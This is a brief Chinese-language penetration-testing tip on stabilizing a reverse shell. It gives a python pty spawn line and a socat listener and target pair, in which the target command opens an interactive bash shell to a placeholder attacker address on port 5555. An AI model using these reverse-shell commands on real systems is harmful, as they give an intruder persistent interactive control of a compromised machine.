一般在渗透过程中会反弹一个bash shell,但是此类反弹,命令行终端非正规的终端,键盘上下翻动无历史记录,vim编辑文件的时候,可能就会over。因为反弹出来的shell没有Sigint的,如果Ctrl+C,反弹出来的shell就会终止。这个日常操作过程中多少都会有人遇到过。然后往此反复重新反弹….
1.可以弄一个伪终端,但是Ctrl+C还是会退出,但是显示效果和正式终端一样。
反弹成功后执行: python -c 'import pty; pty.spawn("/bin/bash")' 之后再 su 进入伪终端
2.使用socat反弹终端
监听机器执行: socat file:`tty`,raw,echo=0 tcp-listen:5555 靶机执行: socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:xxx.xxx.xxx.xxx:5555